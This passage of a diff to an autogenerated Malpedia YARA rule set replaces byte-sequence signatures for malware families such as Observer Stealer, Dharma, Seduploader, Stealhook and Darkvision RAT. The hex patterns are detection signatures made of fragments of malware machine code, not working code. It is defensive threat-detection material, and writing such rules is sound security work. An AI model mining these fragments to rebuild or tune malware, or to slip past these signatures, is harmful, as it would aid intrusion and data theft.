+		$sequence_3 = { 68ff0f1f00 ff9695000000 83f800 74ac }
+		$sequence_4 = { 8d8656040000 50 6801000080 ff5635 8d8665010000 50 }
+		$sequence_5 = { 3b86b0080000 747c 8986b0080000 6804010000 8d85fcfdffff }
+		$sequence_6 = { 6a01 6a00 e8???????? 53 4f 46 }
+		$sequence_7 = { ff5621 8945f4 6a00 8d4df8 }
+		$sequence_8 = { ffb6e1000000 ff96dd000000 8945f4 6a00 ff75f8 ffb6ed000000 6a00 }
+		$sequence_9 = { 03d0 8b442410 03c2 89442410 8bc6 99 f7f9 }
 
 	condition:
-		7 of them and filesize < 113664
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Shareip_Auto : FILE
+rule MALPEDIA_Win_Etumbot_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9f46ee27-fcc3-5b26-9e77-331cb46925ef"
+		id = "c874e7f9-5803-51aa-bcc8-4faaaf0ce1ce"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.shareip"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.shareip_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.etumbot"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.etumbot_auto.yar#L1-L358"
 		license_url = "N/A"
-		logic_hash = "b24d153dc5c903a6f61d1f00b3b16ac72a620a7bd569254dc7e2236cbdbfd920"
+		logic_hash = "bab72b55d5937eff166f630a71bea6d6d650e72f44dc18db352baddef63ef002"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -147921,32 +147844,62 @@ rule MALPEDIA_Win_Shareip_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8b02 8d8c2414010000 ffd0 83bc243001000000 7425 83bc242401000000 7412 }
-		$sequence_1 = { 56 894c2438 33d2 50 8d4c2440 895c2458 89742454 }
-		$sequence_2 = { 83f8ff 7566 be10000000 39742444 720d 8b542430 52 }
-		$sequence_3 = { 8b7e10 8bcf 2b4d10 b867666666 f7e9 c1fa03 8bc2 }
-		$sequence_4 = { 8b542468 89542424 eb08 8d442468 89442424 39b424ec000000 720d }
-		$sequence_5 = { 8bc2 c1e81f 03c2 83f803 0f8557feffff 8d78ff 8d742414 }
-		$sequence_6 = { 50 8d4c2420 51 8d5f20 c744243803000000 89542448 e8???????? }
-		$sequence_7 = { 8d442408 8da42400000000 8a10 3a11 751a 84d2 }
-		$sequence_8 = { 8b01 8d7001 8a10 40 84d2 75f9 2bc6 }
-		$sequence_9 = { 8bce bb03000000 e8???????? eb02 33c0 c78424b000000002000000 8907 }
+		$sequence_0 = { 8a00 02c2 0fb6c0 8a8405fcfeffff }
+		$sequence_1 = { 0fb6c0 8a8405fcfeffff 320437 8806 46 }
+		$sequence_2 = { c745b063726f73 c745b46f66745c c745b85c57696e c745bc646f7773 c745c05c5c4375 c745c47272656e }
+		$sequence_3 = { f7d1 23c1 42 4e 75df }
+		$sequence_4 = { 8d45f4 6820a10700 50 68???????? 68???????? }
+		$sequence_5 = { c745cc73696f6e c745d05c5c496e c745d47465726e c745d865742053 }
+		$sequence_6 = { 03c1 8bc8 81e1000000f0 7407 8bf9 }
+		$sequence_7 = { 7407 8bf9 c1ef18 33c7 f7d1 23c1 }
+		$sequence_8 = { c745d47465726e c745d865742053 c745dc65747469 c745e06e677300 }
+		$sequence_9 = { 53 56 57 8b3d???????? ffd7 8b7508 8bd8 }
+		$sequence_10 = { 57 0fbe38 33f6 33db }
+		$sequence_11 = { c745c47272656e c745c874566572 c745cc73696f6e c745d05c5c496e }
+		$sequence_12 = { ffd7 2bc3 3bc6 72ed 5f 5e }
+		$sequence_13 = { 8b45f4 0345f0 8b4d08 034dec 8a11 8810 }
+		$sequence_14 = { c645bf69 c645c062 c645c16c c645c265 c645c33b c645c420 c645c54d }
+		$sequence_15 = { 8b4d08 83c101 894d08 8b550c 83ea03 }
+		$sequence_16 = { 83c204 3b5514 7608 83c8ff }
+		$sequence_17 = { 80e10f c0e102 c0eb06 02cb }
+		$sequence_18 = { c644242c45 8854242f 884c2431 c644243273 88542434 }
+		$sequence_19 = { 83c404 8bd1 c1e902 f3ab 8bca }
+		$sequence_20 = { 6a00 68???????? 6a00 6a00 6a00 51 68???????? }
+		$sequence_21 = { e8???????? 8d45fc 50 8d85bcfeffff 50 e8???????? }
+		$sequence_22 = { 8b0c8d20cf4000 8a44c104 83e040 c3 56 8b742408 85f6 }
+		$sequence_23 = { b9ff000000 33c0 8dbda6fbffff f3ab }
+		$sequence_24 = { c645d673 c645d720 c645d84e c645d954 }
+		$sequence_25 = { 83c104 3b4d14 7608 83c8ff }
+		$sequence_26 = { 50 8d85c4eaffff 50 e8???????? 8d85ecfdffff }
+		$sequence_27 = { 59 50 8d8504ffffff e9???????? 6a18 }
+		$sequence_28 = { c645c33b c645c420 c645c54d c645c653 c645c749 c645c845 c645c920 }
+		$sequence_29 = { 8b4508 8365f800 898184110000 8d45f4 6a00 }
+		$sequence_30 = { 83c404 85c0 7429 8b442454 0fbe38 40 85ff }
+		$sequence_31 = { 89442428 f3ab 88542414 89542444 }
+		$sequence_32 = { c645d057 c645d169 c645d26e c645d364 }
+		$sequence_33 = { c645cd31 c645ce3b c645cf20 c645d057 c645d169 }
+		$sequence_34 = { 52 e8???????? 83c404 e9???????? 6a05 }
+		$sequence_35 = { c645fa74 c645fb2e c645fc64 c645fd6c }
+		$sequence_36 = { c645f569 c645f66e c645f769 c645f86e }
+		$sequence_37 = { 8b4df4 034df0 8b5508 0355ec }
+		$sequence_38 = { 50 8b4dbc 51 8b952ce6ffff 8b4210 ffd0 85c0 }
+		$sequence_39 = { c685dcefffff45 c685ddefffff20 c685deefffff35 c685dfefffff2e c685e0efffff30 }
 
 	condition:
-		7 of them and filesize < 811008
+		7 of them and filesize < 450560
 }
-rule MALPEDIA_Win_Cmstar_Auto : FILE
+rule MALPEDIA_Win_Lightwork_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a9e2a661-537d-568b-85df-f27a686a58fb"
+		id = "d343952d-c497-57b0-a1b6-2c344677756b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cmstar_auto.yar#L1-L177"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lightwork"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lightwork_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "cb1d0cd52e24cba8a51ced68bf521fb28bf6b675c076737849c87cad9d60f02d"
+		logic_hash = "ab480be92b4f3e94b9e8b99934bd7d24840465004bb1c1ae3a81e26cd770a803"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -147960,38 +147913,32 @@ rule MALPEDIA_Win_Cmstar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 53 56 bb04010000 57 53 }
-		$sequence_1 = { 8b45e8 ff75e0 ff30 e8???????? 8b4df8 }
-		$sequence_2 = { 8b4dec c1e802 6a04 52 8d0481 50 e8???????? }
-		$sequence_3 = { ff15???????? 8bc6 e9???????? 6a10 }
-		$sequence_4 = { ff15???????? 6a04 e8???????? be00040000 }
-		$sequence_5 = { 8b45d8 836dfc10 ff75fc 8945e0 8b45dc 83c310 8945e4 }
-		$sequence_6 = { ff15???????? 6a03 58 5f 5e 5b c9 }
-		$sequence_7 = { 85c0 7504 6a03 eb0d 803b4d }
-		$sequence_8 = { 888204420010 83c9ff 33c0 42 f2ae f7d1 49 }
-		$sequence_9 = { 8bf0 85f6 74b2 817c240cc8000000 741c a1???????? 33f6 }
-		$sequence_10 = { 81ec08060000 53 55 56 57 33db b9ff000000 }
-		$sequence_11 = { a1???????? 8b10 52 53 }
-		$sequence_12 = { 49 8d7c2418 8bc1 83c9ff 89442410 }
-		$sequence_13 = { a1???????? 85c0 7505 a1???????? 6a00 6a00 6a03 }
-		$sequence_14 = { be01000000 8b4c2420 51 ff15???????? 3beb 7409 55 }
-		$sequence_15 = { 64890d00000000 81c4c0120000 c3 8b8c24d0120000 33db 3bcb 741c }
+		$sequence_0 = { 8d5001 8b4508 8990c8010000 8b4508 890424 e8???????? 8b4508 }
+		$sequence_1 = { 83e0e0 89c2 8b450c 83e01f 09d0 }
+		$sequence_2 = { c3 55 89e5 8b4508 83c011 5d c3 }
+		$sequence_3 = { e8???????? 69d0e8030000 8b450c 01d0 8945f4 8b45f4 89c2 }
+		$sequence_4 = { 8b80d8010000 8b5510 89542408 8b550c 89542404 890424 e8???????? }
+		$sequence_5 = { 7419 8b45f0 8b55f4 89442404 89542408 8b4508 890424 }
+		$sequence_6 = { 55 89e5 8b4508 0fb64005 83e0f0 89c2 8b450c }
+		$sequence_7 = { 89e5 8b4508 c74008???????? 8b4508 c740047d000000 90 5d }
+		$sequence_8 = { 890424 e8???????? 8b450c 8b4014 014518 8b5518 8b4510 }
+		$sequence_9 = { 66894819 0fb65206 88501b 8b4508 c9 c3 55 }
 
 	condition:
-		7 of them and filesize < 4268032
+		7 of them and filesize < 1132544
 }
-rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
+rule MALPEDIA_Win_Puzzlemaker_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c0737640-3fea-5607-8cf7-00374c1f837c"
+		id = "62794821-c42e-5220-ad0d-6e7823ce4882"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.observer_stealer"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.observer_stealer_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.puzzlemaker"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.puzzlemaker_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "0be9a733455d3fbd7030daf285d74174d225df89f30a4020aa754c9c1ec43bc3"
+		logic_hash = "e75d1e0c1e55c34f83f0daa3660ed41869121e99648bc4cb3b1da2986e8ecbae"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148005,32 +147952,32 @@ rule MALPEDIA_Win_Observer_Stealer_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 59 57 8bc8 e8???????? 6a14 89442418 e8???????? }
-		$sequence_1 = { 8bcb e8???????? e9???????? 85ff 74cc 68???????? 8d4c2418 }
-		$sequence_2 = { c3 33c0 8bd1 53 56 57 8bfa }
-		$sequence_3 = { 59 59 c20400 56 8bf1 8b46e0 8b4004 }
-		$sequence_4 = { c3 83ec10 53 8bc1 55 }
-		$sequence_5 = { 55 e8???????? 3bc7 0f87ab000000 6bc024 50 89442414 }
-		$sequence_6 = { 8b751c 56 68???????? 57 e8???????? 8b4510 }
-		$sequence_7 = { 894d0c 894508 3d00100000 7215 8d4508 50 8d450c }
-		$sequence_8 = { 8d4dc0 68???????? e8???????? 837d3408 8d4d20 8d4508 0f434d20 }
-		$sequence_9 = { 89773c c7474001000000 c74750fb5d7708 e8???????? 8bc7 5f 5e }
+		$sequence_0 = { c74078feffffff 83ffff 0f8c60040000 41837e0800 4c8d05b7b6ffff }
+		$sequence_1 = { 4883ec20 8bfa 4c8d0d25a00000 488bd9 488d151ba00000 b916000000 4c8d0507a00000 }
+		$sequence_2 = { 448bc0 4c8d157d0a0200 0f1f4000 660f1f840000000000 410fb6d0 420fb60c12 }
+		$sequence_3 = { 488905???????? 4885c0 7551 488b0d???????? 488d157c160200 }
+		$sequence_4 = { 4c8d0d3da30000 33c9 4c8d0530a30000 488d1531a30000 e8???????? 4885c0 }
+		$sequence_5 = { ff15???????? 4c8be0 4c896ddf 488b4dc7 488b11 4c8b5230 }
+		$sequence_6 = { e8???????? 488db328010000 bd06000000 488d7b38 488d05462d0100 }
+		$sequence_7 = { 84c0 7421 4885db 750b 488d1d83f20000 48895f48 4863d6 }
+		$sequence_8 = { 7410 41ffc0 4983c102 4181f880000000 72e1 448bc0 }
+		$sequence_9 = { 418bd2 4d8b8cc7f02b0200 498bfa 4b8d04f1 443854383e }
 
 	condition:
-		7 of them and filesize < 614400
+		7 of them and filesize < 331776
 }
-rule MALPEDIA_Win_Hawkball_Auto : FILE
+rule MALPEDIA_Win_Seduploader_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "233d17b2-2f85-5e81-980e-94af1bd07bc8"
+		id = "8fb6991a-2035-5d98-8418-a7713bf4dcf3"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hawkball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hawkball_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.seduploader"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.seduploader_auto.yar#L1-L113"
 		license_url = "N/A"
-		logic_hash = "9b3366bae76271a5cf9e32b5f0daa7b3fc0e06cb94c8f54801829ffbaa6e0521"
+		logic_hash = "322f530e99af9eadb7926bd0383665644ca1fdc1bbd87072e1c813cec7a54a88"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148044,32 +147991,32 @@ rule MALPEDIA_Win_Hawkball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 50 53 6a00 68e9fd0000 }
-		$sequence_1 = { c3 6a59 ff15???????? 85c0 0f84b4000000 be???????? 8bc6 }
-		$sequence_2 = { 56 8b7508 833e00 7f0a be04000000 e9???????? }
-		$sequence_3 = { ff75f8 c745fc00000000 ffd6 8b45fc 8b1d???????? 40 50 }
-		$sequence_4 = { 56 f30f7f4588 57 660f6f05???????? 8b3d???????? f30f7f4598 }
-		$sequence_5 = { 50 668945dc 0f57c0 668985acf7ffff 8d85aef7ffff 50 c745d801000000 }
-		$sequence_6 = { ff15???????? 8b4309 83f801 751c 8b5508 8d85f8fdffff 50 }
-		$sequence_7 = { 85c0 741e 8d85fcfeffff 68???????? 50 e8???????? }
-		$sequence_8 = { ffd6 50 ffd3 ff0d???????? 33c0 5f }
-		$sequence_9 = { 6a08 ffd3 50 ff15???????? 8bf0 8d8578ffffff 50 }
+		$sequence_0 = { ff763c e8???????? 83c40c 3b4508 }
+		$sequence_1 = { 50 e8???????? 8b4510 83c6fe 8930 8d4601 50 }
+		$sequence_2 = { 8b4510 83c6fe 8930 8d4601 50 e8???????? }
+		$sequence_3 = { 83c6fe 8930 8d4601 50 e8???????? }
+		$sequence_4 = { 8b4510 83c6fe 8930 8d4601 }
+		$sequence_5 = { e8???????? 8b4510 83c6fe 8930 8d4601 }
+		$sequence_6 = { 56 6a3e 8bf1 e8???????? }
+		$sequence_7 = { 8b4510 83c6fe 8930 8d4601 50 }
+		$sequence_8 = { 50 e8???????? 8b4510 83c6fe 8930 }
+		$sequence_9 = { 83c6fe 8930 8d4601 50 }
 
 	condition:
-		7 of them and filesize < 229376
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Dharma_Auto : FILE
+rule MALPEDIA_Win_Stealhook_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e4f9cff7-2b7e-5614-97de-e64666dbaa6b"
+		id = "b998f829-6a22-55c4-913b-e54119474a49"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dharma"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dharma_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealhook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealhook_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "ed48c8d46095165b3771ad3d606dd9e4c3ca951524311f4024cd2a8039cd375d"
+		logic_hash = "50f44fb127afc2237096592b9ec06ad6fce68e47e81e08acb0de7cd16e206d85"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148083,32 +148030,32 @@ rule MALPEDIA_Win_Dharma_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 51 8b5510 52 8b450c 50 8b4df0 c1e105 }
-		$sequence_1 = { c1ea10 81e2ff000000 8b048db8b34000 330495b8b74000 }
-		$sequence_2 = { 50 e8???????? 83c408 c785c4fdffff01000000 8b8dd4fdffff 51 e8???????? }
-		$sequence_3 = { 51 8b55fc 52 ff15???????? 8b4df8 89048db8864100 8b55f8 }
-		$sequence_4 = { 8b4508 8b4d08 8908 c745f801000000 8b5510 c70201000000 8b45f8 }
-		$sequence_5 = { 51 6a00 8b55ec 52 e8???????? 83c40c 8b45ec }
-		$sequence_6 = { 8b45fc 50 e8???????? 50 6a00 }
-		$sequence_7 = { 50 8b4d10 51 8d95e0fdffff 52 e8???????? 83c410 }
-		$sequence_8 = { 8b4d08 0fb6548121 8b8590feffff 0b9485b8feffff 8b8d90feffff 89948db8feffff }
-		$sequence_9 = { 68feff0000 e8???????? 83c404 8945ac e8???????? 8945d0 6a02 }
+		$sequence_0 = { 410fb6868e000000 41884705 410fb6868f000000 41884704 410fb68690000000 4188470b 418b8690000000 }
+		$sequence_1 = { e8???????? 48833b00 488d0dd7170500 480f450b }
+		$sequence_2 = { 4a0fbe8419389a0600 428a8c19489a0600 4c2bd0 418b4048 418b52fc d3ea 03c2 }
+		$sequence_3 = { 83e10f 480fbe8411389a0600 8a8c11489a0600 4c2bc0 418b40fc d3e8 4d894708 }
+		$sequence_4 = { 4d8bf8 4c896910 4c8bc6 4c896918 488bee e8???????? 458be5 }
+		$sequence_5 = { 33d2 4903c1 49f7f1 49837e1807 488d0451 498bce 7603 }
+		$sequence_6 = { 488b4590 48634804 4c896c0d90 488b4590 }
+		$sequence_7 = { e8???????? 90 488d542450 48837c24680f 480f47542450 41b8e8030000 488d4c2470 }
+		$sequence_8 = { 66480f6ec8 660f2f25???????? 0f82df000000 48c1e82c 660feb15???????? 660feb0d???????? 4c8d0dd4fd0000 }
+		$sequence_9 = { 4c8b5577 488d05d9350300 0f1000 4c8bd9 488d4c2430 }
 
 	condition:
-		7 of them and filesize < 204800
+		7 of them and filesize < 1129472
 }
-rule MALPEDIA_Win_Mediapi_Auto : FILE
+rule MALPEDIA_Win_Feed_Load_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93eb6857-89ab-509f-a3db-521b6138e920"
+		id = "12c918c0-c452-5da2-b8ac-4e16f1c3b07c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mediapi"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mediapi_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.feed_load"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.feed_load_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "62d55dbda71843c208580e1ce14906c348dc561d976d6517a9642b390fe58aad"
+		logic_hash = "722b483a312044af2fe5076c6a59554ad3a69ee6c355530da497915e66c263d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148122,34 +148069,34 @@ rule MALPEDIA_Win_Mediapi_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 89c1 e8???????? 8045ff01 ebc3 }
-		$sequence_1 = { 4898 488d95c0010000 41b900000000 41b8d0470000 4889c1 488b05???????? ffd0 }
-		$sequence_2 = { 488b5510 884209 488b5510 0fb645ff 88420d }
-		$sequence_3 = { 8345fc01 837dfc3b 0f86cdfdffff 90 4883c420 5d c3 }
-		$sequence_4 = { 88420b 488b5510 0fb645ff 884207 90 4883c410 }
-		$sequence_5 = { 4889f1 ffd0 488b5b10 4885db 75dc 488d0d35600000 4883c428 }
-		$sequence_6 = { 0fb645db 0fb6c0 c1f802 83e00f 01d0 }
-		$sequence_7 = { 90 488d0506700000 8b00 4898 488d9540010000 41b810000000 }
-		$sequence_8 = { 8845de 0fb645db 0fb6c0 c1e006 89c2 0fb645dc 01d0 }
-		$sequence_9 = { 8b05???????? c1e010 4898 48394518 }
+		$sequence_0 = { 44393d???????? 742c 4c897c2428 4c8d0578faffff 4533c9 44897c2420 33d2 }
+		$sequence_1 = { 48ffc0 4983ef01 75ef 498d5508 488bcd 4c8d4c2458 }
+		$sequence_2 = { 448bc7 488bd0 488bce 4c8bf0 e8???????? 3bc5 7411 }
+		$sequence_3 = { 482bca 4883c302 4183e60f 4983fe0f 0f85bd000000 }
+		$sequence_4 = { e8???????? 8b442450 8905???????? eb17 4c8d442454 e8???????? }
+		$sequence_5 = { 488d15a6550200 448bcf 448bc6 ff15???????? 4423e0 0f84ef010000 488b4b18 }
+		$sequence_6 = { 4889742420 4489442418 55 57 4154 4156 4157 }
+		$sequence_7 = { 8bc2 c1e81f 03d0 8d4310 03c2 48638c24b0000000 3bc8 }
+		$sequence_8 = { e9???????? 488bc3 4c8d3d873affff 498784f798600300 4885c0 7409 }
+		$sequence_9 = { 410fb608 83e10f 4a0fbe841100050200 428a8c1110050200 }
 
 	condition:
-		7 of them and filesize < 246784
+		7 of them and filesize < 512000
 }
-rule MALPEDIA_Win_Virut_Auto : FILE
+rule MALPEDIA_Win_Xiaoba_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "3fd5dd6e-824b-546b-b12a-268a3f416abf"
+		id = "15cc05c8-af5c-56f2-a0b2-68d5a40a2950"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.virut"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.virut_auto.yar#L1-L167"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.xiaoba"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.xiaoba_auto.yar#L1-L133"
 		license_url = "N/A"
-		logic_hash = "de37b05635cd805b87d10763e231c25410e6442bea902a0aedfdfedcccb45534"
+		logic_hash = "95db22137ae310cb1c06897611cc39a7bd77badcb0dab70f72ac629d2a8f20ac"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -148161,38 +148108,32 @@ rule MALPEDIA_Win_Virut_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 83c40c ab ab 8d442430 50 }
-		$sequence_1 = { e9???????? 8dbec8000000 0fb74e1e 8d74311f 6804010000 57 }
-		$sequence_2 = { 3bf1 7ce5 8b442414 6a03 }
-		$sequence_3 = { 6804010000 ff15???????? 8d8424c8000000 50 }
-		$sequence_4 = { 53 6a05 8bcc 50 }
-		$sequence_5 = { 50 ff15???????? 3bc3 0f8484020000 8b400c }
-		$sequence_6 = { 03f9 57 52 6a18 }
-		$sequence_7 = { 54 51 50 52 51 51 }
-		$sequence_8 = { 85c0 7416 e314 50 8bd4 6a00 }
-		$sequence_9 = { 85c0 7d04 33c0 eb63 ff750c }
-		$sequence_10 = { 8d8424dc020000 50 33db 53 ff15???????? 8b35???????? 53 }
-		$sequence_11 = { 6a00 8bcc 6a40 6800001000 }
-		$sequence_12 = { 6a00 6800000008 6a40 51 52 6a0e 50 }
-		$sequence_13 = { 83e003 40 50 8d442428 50 8d8424e0020000 }
-		$sequence_14 = { 3b44240c 8d8c1139300000 894c2414 7cdc 53 8d442410 }
-		$sequence_15 = { 8bd4 50 54 6a40 51 52 }
+		$sequence_0 = { 7407 a9???????? 7557 8b8644010000 33c9 668b8e48010000 85c9 }
+		$sequence_1 = { d9c0 dc642428 dd5c2440 dd442410 dc642420 dd442440 d9c1 }
+		$sequence_2 = { db45fc dd5dd4 dc65d4 dd5dcc db45f8 dd5dc4 }
+		$sequence_3 = { dc442410 dd5c2410 e9???????? db8740010000 dc6c2418 dd5c2418 e9???????? }
+		$sequence_4 = { dd442404 dc0d???????? c3 83c0fe 83f803 0f87cd000000 ff2485bcd24500 }
+		$sequence_5 = { 7414 3d00020000 741a 8d542464 52 ff15???????? ebb2 }
+		$sequence_6 = { ff45f8 f682c1ed660004 894d08 7457 803900 7504 33ff }
+		$sequence_7 = { 53 e8???????? 83c404 8b45ec e9???????? 8be5 5d }
+		$sequence_8 = { 64890d00000000 83c478 c20c00 8b8c2490000000 8b4658 5f 5e }
+		$sequence_9 = { ffd3 c786c400000000000000 57 ff15???????? 8b4c2440 5f 5e }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 5177344
 }
-rule MALPEDIA_Win_Chir_Auto : FILE
+rule MALPEDIA_Win_Darkvision_Rat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "78bff571-2d0f-563f-8afb-2fed2637cee4"
+		id = "1a6f6701-70b7-5c48-928b-485642438bd0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chir"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.chir_auto.yar#L1-L113"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkvision_rat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.darkvision_rat_auto.yar#L1-L130"
 		license_url = "N/A"
-		logic_hash = "13fbf415f29c525be8d7104bf47ab4cf9292f1187b96643f7c39e370c88f7e8f"
+		logic_hash = "ea735f4eeed059962dba8005baff4c34c6d0e6dbba61d43d1f0324dec9b20b8d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -148206,32 +148147,32 @@ rule MALPEDIA_Win_Chir_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 50 c745f840214125 c745fc32212400 e8???????? }
-		$sequence_1 = { 48 59 8bfb 7419 }
-		$sequence_2 = { 8d45f0 50 c745f021352432 c745f451173300 e8???????? 48 }
-		$sequence_3 = { 8d4c15f8 8a19 80f3fc 80c302 80f301 80c303 }
-		$sequence_4 = { 8d45f4 50 c745f421352432 c745f851173300 e8???????? }
-		$sequence_5 = { 740b 48 8906 66837c47fe5c }
-		$sequence_6 = { c745f451173300 e8???????? 48 59 8bfb }
-		$sequence_7 = { 7415 8d4c15f8 8a01 34fc 0402 3401 0403 }
-		$sequence_8 = { 42 8801 3bd7 72eb }
-		$sequence_9 = { 8d45f4 50 c745f421352432 c745f851173300 }
+		$sequence_0 = { eb0a 8b44243c ffc0 8944243c 837c243c64 }
+		$sequence_1 = { 85c0 7523 488d15da6b0300 488b8c2460030000 ff15???????? 488b8c2460030000 ff15???????? }
+		$sequence_2 = { ff15???????? 488b8c2468030000 ff15???????? 41b838000000 33d2 488d8c2428030000 e8???????? }
+		$sequence_3 = { 488d0d9efe0100 48837c010800 7432 4863442424 4869c0040b0000 488d0d83fe0100 66ba6600 }
+		$sequence_4 = { 741d 488b4c2438 ff15???????? 488b4c2430 ff15???????? 33c0 }
+		$sequence_5 = { 4c8d0505910100 baff7f0000 488b4c2440 ff15???????? 4c8d0deaf40200 4c8d05ff900100 baff7f0000 }
+		$sequence_6 = { baffffffff 488b4c0110 ff15???????? 4863442424 486bc028 488d0d71550200 48837c010800 }
+		$sequence_7 = { ff15???????? 4885c0 0f847a010000 488bc8 ff15???????? 488d15e0620000 488bce }
+		$sequence_8 = { 488b4c2430 4803c8 488bc1 4889442470 c744247c00000000 eb0a }
+		$sequence_9 = { ba7c040000 b940000000 ff15???????? 4889442428 48837c242800 0f8477020000 4c8b442428 }
 
 	condition:
-		7 of them and filesize < 286720
+		7 of them and filesize < 618496
 }
-rule MALPEDIA_Win_Dnwipe_Auto : FILE
+rule MALPEDIA_Win_Stresspaint_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1dfcf0b7-155d-5531-9418-b3b6f7b47f6c"
